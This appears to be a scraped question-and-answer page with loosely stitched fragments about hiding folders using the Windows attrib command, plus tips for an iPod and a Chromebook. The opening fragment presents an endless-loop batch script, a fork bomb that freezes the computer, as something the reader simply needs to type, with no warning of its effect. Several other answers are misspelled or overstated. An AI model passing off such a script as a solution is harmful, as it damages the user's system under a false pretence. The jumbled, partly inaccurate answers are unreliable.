the thing that you have to do is nothing but just type in the following
@echo off
:a
start
start
start
start
start
start
goto:a
what is cmd
I am not aware of any way to lock access to a folder directly using command prompt, but there are alternative similar methods. There is an excellent post on the "Computer Tips From A Computer Guy" weblog, that details how to make a folder work as a link to the Control Panel (locked), or simply open and show the contents (unlocked). His method involves using a batch file to change windows reference to the folder. He also provides an alternative method using a 3rd party freeware application called Free Hide Folder, which hides the folder completely, the only way to restore it is open the application and provide a password.
you can change the hidden property for any folder by using the command attrib -s -h -r "foldername" // this to unhide forlder attrib +s +h +r "foldername" // this to hide forlder
how to hide a folder in cmd command
this code can hide the folder no one can search even hide also can not search. Attrib +r+a+s+h foldername this code is getback for the normal folder Attrib -r-a-s-h foldername
first of all u create a folder then use: attrib -h <foldername> to hide it. u can also lock folder using dos by usin number key ...
In nokia mobiles renaming file or folder name with an extension (z.otb) we can hide
To hide the Folder:Open Command prompt in your pc* Click Start> Open RUN> Type cmd> type D:* type " attrib +h D:\abc" ( without any quotes)* It's Look like ( D:\>attrib +h D:\abc )EnterNow you see that in your D drive "abc" folder is vanish !!! You can not find it even in hiddern folder also.To revive the folder* Click Start> Open RUN> Type cmd> type D:* type " attrib -h D:\abc" ( without any quotes)* Look like ( D:\>attrib -h D:\abc )
a file folder can be hidden by changing its properties, and you can always create false pathways (lagre amounts of misleading compounded files) to make it more difficult to find a folder if not using a search
hide command
You can't really hide music on your iPod touch. But you can sorta make your parents not see it by making another folder or a playlist and put that music on it. Or you can do that and put it in AA folder in a folder.
To hide files on an Acer C7 Chromebook, you can use the built-in Files app. Simply create a new folder and name it something discreet, then move the files you want to hide into that folder. While there isn't a direct "hide" feature, you can also ensure that the folder is not easily accessible by not linking it to your Google Drive or other shared services. For added privacy, consider using file encryption tools available through Chrome Web Store.